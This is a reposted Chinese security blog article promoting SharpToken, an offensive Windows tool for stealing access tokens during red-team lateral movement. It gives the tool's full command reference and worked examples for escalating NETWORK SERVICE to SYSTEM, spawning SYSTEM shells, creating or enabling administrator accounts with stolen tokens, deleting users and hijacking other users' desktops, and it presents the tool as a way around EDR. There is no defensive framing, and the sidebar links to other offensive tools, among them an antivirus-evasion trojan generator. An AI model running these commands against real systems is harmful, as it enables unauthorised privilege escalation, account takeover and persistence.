【横向移动】SharpToken - Windows 令牌窃取

admin

102523
文章

87
评论

2023年6月24日00:56:31评论78 views字数 2143阅读7分8秒阅读模式

关注我们 | 发现更多精彩内容

在红队横向移动的过程中，我们经常需要窃取其他用户的权限。在现代 EDR 的防御下，我们很难使用 Mimikatz 获取其他用户的权限，如果目标用户没有活着的进程，我们也没有办法使用“OpenProcessToken”来窃取 Token。

SharpToken 是一种利用令牌泄漏的工具。它可以从系统中的所有进程中找到泄漏的令牌并使用它们。如果你是低权限服务用户，你甚至可以用它升级到“NT AUTHORITYSYSTEM”权限，无需目标用户的密码就可以切换到目标用户的桌面做更多的事情。..

【横向移动】SharpToken - Windows 令牌窃取

用法

SharpToken By BeichenDream=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITYNETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORITYSYSTEMe.g.SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami" bypass

Usage:
SharpToken COMMAND arguments


COMMANDS:
        list_token [process pid]        [bypass]
        list_all_token [process pid] [bypass]
        add_user    <username> <password> [group] [domain] [bypass]
        enableUser <username> <NewPassword> [NewGroup] [bypass]
        delete_user <username> [domain] [bypass]
        execute <tokenUser> <commandLine> [Interactive] [bypass]
        enableRDP [bypass]
        tscon <targetSessionId> [sourceSessionId] [bypass]

example:    SharpToken list_token    SharpToken list_token bypass    SharpToken list_token 6543    SharpToken add_user admin Abcd1234! Administrators    SharpToken enableUser Guest Abcd1234! Administrators    SharpToken delete_user admin    SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami"    SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami" bypass    SharpToken execute "NT AUTHORITYSYSTEM" cmd true    SharpToken execute "NT AUTHORITYSYSTEM" cmd true bypass    SharpToken tscon 1

提升权限

除了通常的Token窃取权限增强，SharpToken还支持通过Bypass获取完整的Token

如果你是 NT AUTHORITY/NETWORK SERVICE 用户，你添加了 bypass 参数，SharpToken 会从 RPCSS 窃取 System，即无条件地将 NT AUTHORITYNETWORK SERVICE 改为 NT AUTHORITYSYSTEM

【横向移动】SharpToken - Windows 令牌窃取

ListToken

枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle（Duplicate后Token的句柄）、TargetProcessId（Token产生的进程）、TargetProcessToken（源进程中Token的句柄）、Groups（Token用户所在的组）位于）

SharpToken list_token

【横向移动】SharpToken - Windows 令牌窃取

枚举来自指定进程的令牌

SharpToken list_token 468

【横向移动】SharpToken - Windows 令牌窃取

获取交互式外壳

execute "NT AUTHORITYSYSTEM" cmd true

【横向移动】SharpToken - Windows 令牌窃取

获取命令执行结果（在webshell下执行）

SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami"

【横向移动】SharpToken - Windows 令牌窃取

使用窃取的令牌创建管理员用户

SharpToken add_user admin Abcd1234! Administrators

使用被盗令牌启用管理员用户

SharpToken enableUser Guest Abcd1234! Administrators

使用被盗令牌删除用户

SharpToken delete_user admin

使用窃取的Token切换到目标桌面

其中1是目标用户的桌面，2是我们要接收的桌面

SharpToken tscon 1 2

项目地址：

https://github.com/BeichenDream/SharpToken

原文始发于微信公众号（Ots安全）：【横向移动】SharpToken - Windows 令牌窃取

左青龙
微信扫一扫

右白虎
微信扫一扫

【横向移动】SharpToken - Windows 令牌窃取

Volatility内存取证工具(Windows篇)

渗透必备悬剑武器库5.04版——悬剑5封装版+云武器库+移动安全包

【RedPersist】一款Windows持久化工具

Defender免杀木马生成shellcode框架

GoDHijack ：自动寻找DLL劫持

HEDnsExtractor：一款功能强大的域名与IP安全评估工具

微软发布免费工业安全检测工具

DecryptTools综合解密后渗透工具

Tomcat漏洞利用工具

国密算法 SM4 SM2 SM3 验证工具，附下载

发表评论

在线咨询

微信